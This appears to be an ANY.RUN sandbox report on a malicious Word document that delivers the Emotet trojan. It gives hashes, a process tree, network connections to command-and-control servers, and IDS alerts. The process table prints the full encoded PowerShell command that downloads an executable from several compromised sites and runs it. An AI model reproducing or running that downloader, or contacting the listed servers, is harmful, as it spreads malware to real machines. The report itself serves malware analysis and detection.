File name: | 67769445.doc |
Full analysis: | https://app.any.run/tasks/0d493ef3-83b0-4c97-ac4b-8ea08051faee |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 08, 2019, 17:34:11 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Accusantium eum perferendis., Author: Andrej Bicek, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Nov 8 13:05:00 2019, Last Saved Time/Date: Fri Nov 8 13:05:00 2019, Number of Pages: 1, Number of Words: 20, Number of Characters: 115, Security: 0 |
MD5: | F013613618A085FFF76E508960B15801 |
SHA1: | 386A781773552EE6F3B21A7A62700A4807E442FA |
SHA256: | 9D3885342A533B749AA077600A96A4131DAEFB1FC646ED41FC6EAC95C94FCE05 |
SSDEEP: | 6144:9XGWIHNaqESzGdD48+akOnZ9RcPI0NFUe3d:9XGWOa9WGe8+ROnrR+jFld |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
HeadingPairs: |
|
---|---|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 134 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 115 |
Words: | 20 |
Pages: | 1 |
ModifyDate: | 2019:11:08 13:05:00 |
CreateDate: | 2019:11:08 13:05:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Andrej Bicek |
Subject: | - |
Title: | Accusantium eum perferendis. |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2176 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\67769445.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
4088 | powershell -enco JABMAGQAdgBzAHgAdwBiAHYAcQBmAHYAPQAnAEQAcABrAHQAeQB5AHoAaAAnADsAJABMAHAAZgBvAHgAZQBxAGQAegBhACAAPQAgACcAMgA3ADUAJwA7ACQAQwBsAGEAbABjAGUAdQBxAD0AJwBWAGMAaQBoAHoAYwB3AGoAdgBmAHQAZwBsACcAOwAkAEgAdAByAGUAbgBoAGcAZQB6AHcAegB5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABMAHAAZgBvAHgAZQBxAGQAegBhACsAJwAuAGUAeABlACcAOwAkAEcAawBhAGMAcwBpAGUAdQB1AHEAbQA9ACcAVABtAGwAZgBtAGYAaABtAGIAbQB6ACcAOwAkAEkAegBmAHcAdAB6AHAAYwBlAD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcAZQBiAGMATABpAGUATgB0ADsAJABBAHgAdgBzAG8AeAB5AG4AZQByAD0AJwBoAHQAdABwAHMAOgAvAC8AYgBsAG8AZwAuAHAAcgBlAHMAcwB3AGUAYgBzAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AbQBLAGYAbABXADgAWgA5AC8AKgBoAHQAdABwAHMAOgAvAC8AdwBpAGQAZQB3AGUAYgBpAHQALgBjAG8AbQAvAGoAZQBuAHcAZQBkAC8AMABRAHMALwAqAGgAdAB0AHAAcwA6AC8ALwBiAGwAbwBnAC4AdwBpAG4AbABpAGYAZQBpAG4AZgBvAHMAeQBzAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8ARQBTADQATQAvACoAaAB0AHQAcABzADoALwAvAHcAbQB2AC4AdgBpAG4AYwBlAHMAawBpAGwAbABpAG8AbgAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANwB4AHAAcgBnAHkAVgB6AGQALwAqAGgAdAB0AHAAcwA6AC8ALwBkAGgAbQBlAGcAYQB2AGkAcwBpAG8AbgAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwA3ADMAbABRAE4AeQBCAE0ALwAnAC4AIgBzAGAAUABsAEkAVAAiACgAJwAqACcAKQA7ACQAWABsAGQAaAB2AGEAZwB2AD0AJwBUAG8AdgBwAHIAaQBvAHEAbgBoAGcAcQAnADsAZgBvAHIAZQBhAGMAaAAoACQAUABzAHUAeQB4AG0AcwB1AHIAaQB6AHkAIABpAG4AIAAkAEEAeAB2AHMAbwB4AHkAbgBlAHIAKQB7AHQAcgB5AHsAJABJAHoAZgB3AHQAegBwAGMAZQAuACIARABvAHcAYABOAGwATwBBAGAARABmAGkATABFACIAKAAkAFAAcwB1AHkAeABtAHMAdQByAGkAegB5ACwAIAAkAEgAdAByAGUAbgBoAGcAZQB6AHcAegB5ACkAOwAkAE8AdABmAG0AZABmAHkAYgBnAHEAawB0AD0AJwBVAGwAcAB1AHgAcwByAHEAcgBwACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQASAB0AHIAZQBuAGgAZwBlAHoAdwB6AHkAKQAuACIAbABFAG4ARwBgAFQASAAiACAALQBnAGUAIAAzADIANQAwADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAQQBSAHQAIgAoACQASAB0AHIAZQBuAGgAZwBlAHoAdwB6AHkAKQA7ACQAVgBsAG8AdgBoAGIAagB0AGIAdQA9ACcAUQB2AHMAaABlAGYAeQByAGMAdgBiAHMAJwA7AGIAcgBlAGEAawA7ACQAUgBjAHgAYwBwAHcAegBzAGMAcABzAHUAPQAnAEgAdABzAHEAdQBiAGgAeAB6AGoAbQBrACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEsAegBrAHcAagBvAGoAZwB3AHoAPQAnAFQAeABzAGMAcABrAGMAZwBrAGkAYwBrAHgAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1800 | "C:\Users\admin\275.exe" | C:\Users\admin\275.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3928 | --4494506e | C:\Users\admin\275.exe | 275.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3372 | "C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe" | C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe | — | 275.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1324 | --dfba43e0 | C:\Users\admin\AppData\Local\wholesspi\wholesspi.exe | wholesspi.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2176 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA95A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
4088 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JB76KYI47B9L11MQZ79Y.temp | — | |
MD5:— | SHA256:— | |||
2176 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF50967373E42E5126.TMP | — | |
MD5:— | SHA256:— | |||
2176 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C39DCD18-3F71-4C41-BC7C-8C57C01A2BCE}.tmp | — | |
MD5:— | SHA256:— | |||
2176 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{53A4EE63-149B-4CE5-A0E4-CC3DAC3C545E}.tmp | — | |
MD5:— | SHA256:— | |||
2176 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1AB38E24.wmf | wmf | |
MD5:60F56AA86368BD6E1CFE32D68B2E681F | SHA256:4E8FF14CFEEB41A1DC8349F147E6E0E746D32777FE2A4789C0CA295A459FDFAB | |||
2176 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B972BD2.wmf | wmf | |
MD5:727F0179A173BB236CC24D409D3C687F | SHA256:78B213615AAED2E04B24EC4FAF22582C63E9A6529BF96A407C8A056EDA7FBF5D | |||
2176 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EAEA8F26.wmf | wmf | |
MD5:D36204EBB927DB50E32BF1908296F092 | SHA256:ACBF3A297C49801660222604E4A07C2DD5BC76E563F4E88455E1635A343A8276 | |||
2176 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2BE13758.wmf | wmf | |
MD5:A36F6403DED0254F6F12A83745CA6313 | SHA256:4C98C2906742CE46A469847D8742A750653FD2CEA424B7208EC6408BB4358E72 | |||
2176 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$769445.doc | pgc | |
MD5:ADE3E7A994816F4BB89A0512C6B86C8A | SHA256:2F85A5BC42907E341505440D113FD15DE1E2292E108F4463D7B6886E7D24A728 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1324 | wholesspi.exe | POST | — | 165.227.156.155:443 | http://165.227.156.155:443/entries/ | DE | — | — | malicious |
1324 | wholesspi.exe | POST | — | 104.239.175.211:8080 | http://104.239.175.211:8080/scripts/iab/add/ | US | — | — | malicious |
1324 | wholesspi.exe | POST | — | 67.225.179.64:8080 | http://67.225.179.64:8080/chunk/balloon/ | US | — | — | malicious |
2176 | WINWORD.EXE | GET | 200 | 52.109.76.6:80 | http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={019C826E-445A-4649-A5B0-0BF08FCC4EEE}&build=14.0.6023 | IE | xml | 1.99 Kb | whitelisted |
1324 | wholesspi.exe | POST | — | 46.105.131.87:80 | http://46.105.131.87/health/window/add/merge/ | FR | — | — | malicious |
1324 | wholesspi.exe | POST | — | 183.102.238.69:465 | http://183.102.238.69:465/balloon/forced/add/merge/ | KR | — | — | malicious |
1324 | wholesspi.exe | POST | — | 45.33.49.124:443 | http://45.33.49.124:443/stubs/results/add/ | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2176 | WINWORD.EXE | 52.109.76.6:80 | office14client.microsoft.com | Microsoft Corporation | IE | whitelisted |
4088 | powershell.exe | 104.31.89.48:443 | widewebit.com | Cloudflare Inc | US | shared |
4088 | powershell.exe | 192.241.189.146:443 | blog.presswebs.com | Digital Ocean, Inc. | US | unknown |
1324 | wholesspi.exe | 74.208.125.192:443 | — | 1&1 Internet SE | US | malicious |
1324 | wholesspi.exe | 165.227.156.155:443 | — | Digital Ocean, Inc. | DE | malicious |
1324 | wholesspi.exe | 67.225.179.64:8080 | — | Liquid Web, L.L.C | US | malicious |
1324 | wholesspi.exe | 45.33.49.124:443 | — | Linode, LLC | US | malicious |
2176 | WINWORD.EXE | 52.109.8.27:443 | rr.office.microsoft.com | Microsoft Corporation | US | whitelisted |
1324 | wholesspi.exe | 104.239.175.211:8080 | — | Rackspace Ltd. | US | malicious |
1324 | wholesspi.exe | 46.105.131.87:80 | — | OVH SAS | FR | malicious |
Domain | IP | Reputation |
---|---|---|
blog.presswebs.com |
| unknown |
widewebit.com |
| malicious |
office14client.microsoft.com |
| whitelisted |
dns.msftncsi.com |
| shared |
rr.office.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
1324 | wholesspi.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
1324 | wholesspi.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
1324 | wholesspi.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
1324 | wholesspi.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 4 |
1324 | wholesspi.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
1324 | wholesspi.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
1324 | wholesspi.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 1 |
1324 | wholesspi.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
1324 | wholesspi.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 21 |
1324 | wholesspi.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |